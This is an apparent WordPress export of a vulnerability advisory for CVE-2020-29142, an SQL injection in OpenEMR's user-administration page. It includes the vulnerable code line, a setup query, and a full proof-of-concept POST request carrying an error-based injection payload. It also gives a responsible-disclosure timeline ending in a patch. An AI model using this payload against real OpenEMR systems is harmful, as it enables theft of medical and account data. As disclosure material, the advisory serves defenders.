{"id":90,"date":"2021-02-15T01:54:52","date_gmt":"2021-02-14T19:54:52","guid":{"rendered":"https:\/\/murat.one\/?p=90"},"modified":"2021-02-15T02:28:52","modified_gmt":"2021-02-14T20:28:52","slug":"cve-2020-29142-sql-injection-vulnerability-in-interface-usergroup-usergroup_admin-php-in-openemr-6-0-0-dev-5-0-25","status":"publish","type":"post","link":"https:\/\/murat.one\/?p=90","title":{"rendered":"CVE-2020-29142. SQL injection vulnerability in OpenEMR 6.0.0-dev, 5.0.2(5)"},"content":{"rendered":"\n<p><a><strong>Product:<\/strong><\/a> OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)<\/p>\n\n\n\n<p><strong>Vulnerability:<\/strong> SQL injection<\/p>\n\n\n\n<p><strong>Discovered:<\/strong> Kutlymurat Mambetniyazov (@manfromkz)<\/p>\n\n\n\n<p><strong>Acknowledgements: <\/strong>NitroTeam.kz<\/p>\n\n\n\n<p><strong>Date:<\/strong> 11\/24\/2020<\/p>\n\n\n\n<p><strong>Description: <\/strong>Ineffective use of add_escape_custom() in interface\/usergroup\/usergroup_admin.php leads to SQL injection.<\/p>\n\n\n\n<p><strong>Requirements: <\/strong>global restrict_user_facility = on, the administrator account<\/p>\n\n\n\n<p><strong>Tested on: <\/strong>Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev<\/p>\n\n\n\n<p><strong>Vulnerable code: <\/strong>interface\/usergroup\/usergroup_admin.php:150<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>and facility_id not in (\" . add_escape_custom(implode(\",\", $_POST&#91;'schedule_facility'])) . \")\", array($_POST&#91;\"id\"]));<\/code><\/pre>\n\n\n\n<p><strong>Steps to reproduce<\/strong>:<\/p>\n\n\n\n<p>1. Run the SQL query to meet the requirements:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE `globals` SET `gl_value` = '1' WHERE `globals`.`gl_name` = 'restrict_user_facility'<\/code><\/pre>\n\n\n\n<p>2. Send the POST request (replace with your Host, valid csrf_token_form and OpenEMR cookie of administrator):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/interface\/usergroup\/usergroup_admin.php HTTP\/1.1\nHost: openemr60.kz\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 420\nConnection: close\nCookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD; \n\ncsrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&amp;pre_active=1&amp;get_admin_id=0&amp;admin_id=&amp;check_acl=&amp;mname=&amp;lname=Administrator&amp;facility_id=3&amp;taxid=&amp;drugid=&amp;upin=&amp;see_auth=1&amp;npi=&amp;job=&amp;main_menu_role=standard&amp;patient_menu_role=standard&amp;access_group%5B%5D=Administrators&amp;comments=&amp;id=1&amp;mode=update&amp;privatemode=user_admin&amp;secure_pwd=1&amp;schedule_facility&#91;]=1&amp;schedule_facility&#91;]=extractvalue(0x0a,concat(0x0a,(user())))<\/code><\/pre>\n\n\n\n<p>Screenshot for 6.0.0-dev:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"463\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-1024x463.png\" alt=\"\" class=\"wp-image-91\" srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-1024x463.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-300x136.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5-768x347.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-5.png 1361w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Screenshot for 5.0.2(5):<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"447\" src=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-1024x447.png\" alt=\"\" class=\"wp-image-92\" srcset=\"https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-1024x447.png 1024w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-300x131.png 300w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6-768x335.png 768w, https:\/\/murat.one\/wp-content\/uploads\/2021\/02\/image-20210215004946-6.png 1394w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Timeline of the vulnerability:<\/p>\n\n\n\n<p>11\/24\/2020 \u2013 vulnerability discover<br>11\/24\/2020 \u2013 notification to vendor<br>11\/25\/2020 \u2013 confirmation by vendor<br>11\/27\/2020 \u2013 reservation of CVE ID at MITRE<br>01\/07\/2021 \u2013 patch release<br>02\/15\/2021 \u2013 published<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ineffective use of add_escape_custom() in interface\/usergroup\/usergroup_admin.php leads to SQL injection  in OpenEMR 6.0.0-dev, 5.0.2(5).<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[10,14],"tags":[18,15,17,16],"_links":{"self":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90"}],"collection":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=90"}],"version-history":[{"count":4,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90\/revisions"}],"predecessor-version":[{"id":109,"href":"https:\/\/murat.one\/index.php?rest_route=\/wp\/v2\/posts\/90\/revisions\/109"}],"wp:attachment":[{"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=90"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=90"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/murat.one\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=90"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}